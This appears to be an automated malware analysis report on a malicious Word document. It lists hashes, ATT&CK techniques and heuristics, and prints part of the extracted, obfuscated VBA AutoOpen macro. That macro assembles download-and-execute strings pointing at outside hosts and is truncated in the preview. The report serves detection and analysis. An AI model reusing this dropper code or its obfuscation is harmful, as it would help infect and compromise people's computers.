Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9fa1c13118145d2a…

MALICIOUS

Office (OLE)

Size: 136.5 KB
Created: 2018-02-13 11:06:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: 9b338f431aa7dec40e718cca1a3d7389
SHA-1: 07aafd0a1dde076d01437fa2ffb8efceb62867bf
SHA-256: 9fa1c13118145d2a5457bbf7470e4d1ce46cc76a3b70e1fa3da2948856d172d1
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1203 Exploitation for Client Execution

The sample contains a VBA macro with an AutoOpen function that uses the Shell() function to execute arbitrary code. The script builds a URL by concatenating string fragments (via Mid() and "+" expressions, with filler arithmetic between the real statements), and that URL is most likely used to download and execute a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-6447691-0' further supports its classification as a dropper.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6447691-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6447691-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://mybt+ybhVQDNJjYXOwKqVMLqjdD In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 29317 bytes
SHA-256: 348f754fe284eed526687a435718511e8567e26efa098e868cc2b214ef5b663b

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "QiDZNiaq"
Sub AutoOpen()
On Error Resume Next
iWiPnPFzm = svqiHNI - Sgn(zAIdawTMnBMf) - (6966736 - Tan(2901888) / 2046191 - ChrW(KsiXOEkPJioOc))
WFmQHiQqF = hvbcEmGhdlwUOj - Sgn(YvPsTwIFkQv) - (5088986 - Tan(3060017) / 5518205 - ChrW(tDFwwbnbjcD))
zKcfCrDii = BzlzZqqLJMq - Sgn(trsO) - (3520445 - Tan(7520094) / 1885361 - ChrW(TjPQzzcEOEX))
Application.Run "NSTWAuVqz", wmihiQSahCvcV
ltBsGUwWk = QWQMsRlnnYPVwO - Sgn(hUAcNmw) - (956808 - Tan(7877987) / 1103471 - ChrW(rwmuV))
QYnDMzEGf = RbfHQvnaYzwt - Sgn(LTRbGhan) - (192557 - Tan(8563820) / 653400 - ChrW(wKLFiQtzXUVZhp))
PEXNvZXBc = uXzYEDQibIT - Sgn(bVpjCwzqwst) - (3235289 - Tan(3515665) / 4302758 - ChrW(nzicui))
End Sub
Function wmihiQSahCvcV()
On Error Resume Next
zRnVZEHn = LOh - Sgn(ujHr) - (3267095 - Tan(2908563) / 1486258 - ChrW(CCszXZW))
kWhBVZZ = kcCULcDQYGC - Sgn(jFY) - (3977705 - Tan(721969) / 1411340 - ChrW(JahrPWkjnRp))
ShkmMai = iXKRjMM - Sgn(SfqSKMDiziXtQ) - (7442108 - Tan(2520367) / 1907046 - ChrW(kmw))
XfkCLAB = vGzfHjjk + Mid(hthZIi + "HuRAjldsFjjzk+y'+'bt//www.baybt+ybtbIsKO+sKOze+Izeyybt+ybt-glybt+ybtay'+'bt+ybtsKO+sKOmouybt+ybtIze+Izer.ybt'+'+ybtde/oDVrybt+ybtTu2/Hsybt+ybtb.Split(ySzjsYmEHcOWMKm" + DipKmpDtv, 14, 138)
UNkVcSa = wZNTVP - Sgn(jVnWJKqPCESja) - (7713264 - Tan(702455) / 6809301 - ChrW(ZNIEnnjXYY))
GcVzw = idswOrfLPvsY - Sgn(itwZaaa) - (9064550 - Tan(8140696) / 6528055 - ChrW(IHnwhHzklAhYM))
MwnJlqi = ViIrTjh - Sgn(qZtqGwwwusvw) - (8084865 - Tan(1351599) / 750352 - ChrW(iHwHnRzVkFF))
mqIIzEOTwB = wQwjpYjZnoI + Mid(MUdjPhDSBiIuv + "Ndbt+ybtHsybt+ybtb.exHsb+sKO+sK'+'OHssKO+sKObybt+ybteybsKO+sKOt+sKO+sKOybsKO+sZKzHGWEX" + sJA, 4, 75)
YntLjCaX = VzmWpqfnGtUAL - Sgn(tXbq) - (2544288 - Tan(8375750) / 7969719 - ChrW(KlRsl))
SmniViDJ = kALjGOTibH - Sgn(ouZGuGBM) - (3819382 - Tan(5700039) / 6725918 - ChrW(AspCLnAE))
pffQYCn = EzDFhnuzpPvUSY - Sgn(PDQiQjRCBbKnRM) - (1452288 - Tan(8286309) / 5158310 - ChrW(bjv))
oYjiqm = RDWwMTRNDqBDm + Mid(FpcNiOiaNMn + "sjCiqlGNIcsKO+sKOEnV:c'+'oMSpEc[4,26,25]-JoINIzOKSupJwsl" + BYcXGArGj, 8, 40)
jUPaSStKHG = BtCDMJRmoNWb - Sgn(YZzUEOK) - (9382949 - Tan(9698354) / 3924210 - ChrW(pSidzpSn))
aACGw = fqtFTJizAIoHv - Sgn(ELiEPDjrCY) - (6061926 - Tan(2582255) / 8850891 - ChrW(opwvjknhjt))
RMJjCPlQlJ = vjL - Sgn(pjPulZROlDjKno) - (4013821 - Tan(5029644) / 1219831 - ChrW(zLKKsY))
uQwqiERNi = AMSHOiOnFi + Mid(smIXVoQ + "VVQYmwtikhTnaDwbWlMbybt+ybt1Eybt+ybtOHybt+yI'+'ze+Izebts'+'b +ybt+ybt ybt+ybtaIze+IzsKO+sKOeEFNSBybtIze+sKO+sKOIze+ybbCo" + wCdXAdlhYURr, 20, 98)
wYRJtz = ahiPpsacKnG - Sgn(ojzAZktcTVKok) - (4125854 - Tan(1783765) / 6578017 - ChrW(ZiQC))
mLLDSqN = AfJjkHTiJGZ - Sgn(LChmRzwaTEXu) - (5993693 - Tan(3790907) / 6724011 - ChrW(XlFprFiSrpAlJ))
qrEokjKRdpa = LDOuKGASHiS - Sgn(QvIOEQYaL) - (4689869 - Tan(164961) / 6852976 - ChrW(FUPuczMRitTflJ))
CPDwUPVwrY = tWfoEUUV + Mid(NsQSIFWbMszZz + "cFHIhrEmakzIGWdEiSXLrdBjU+ybtiybt+ybta.comysKO+sKOb'+'t+ybt/aybt+ybtvybt+yb'+'tt2BFybt+ybtL/?ybt+yb'+'thttybt+sKO+sKOybtp://ybIze+Izet+ybtwybt+ECL" + LTtjjAmfnqkrD, 26, 118)
TozPOz = GuiMiQhERsP - Sgn(iJFQApEpGjzmRG) - (1410095 - Tan(6921215) / 4144469 - ChrW(QbQASsYSNoEjG))
mFCCnFdWVV = TGbYwYhiCGc - Sgn(vrvcJzjXb) - (7660854 - Tan(6722174) / 6611542 - ChrW(NricQkZaMSKi))
uBTbVJbF = nzMmZKXszj - Sgn(kfHziLjX) - (8708038 - Tan(6551288) / 6872812 - ChrW(zBlVCzjZkz))
isNioUonDU = rEdWXQpmKck + Mid(MiZnDfvEmlX + "dBcYctylandybt+ybtloybt+ybtv'+'e.sKO+sKOcom/GIze+IzeEybt+ybtfWNrr/?hybt+ybttybIze+Izet+ybttybt'+'+ybtp://tybt+ybtosKO+sKUjKvlEkXKwkKfKlsvNPtWrYGp" + jGKhCoiTHw, 6, 115)
FAamakWFutO = wijTVoK - Sgn(raHimzMaGVzDak) - (8179040 - Tan(1111020) / 327940 - ChrW(ZEh))
ASaEH = RUiUoCQjuY - Sgn(nwuljVoai) - (8124896 - Tan(7934177) / 5015958 - ChrW(rOrdSSP))
TGwIIjq = SLIm - Sgn(RJJ) - (1776198 - Ta
... (truncated)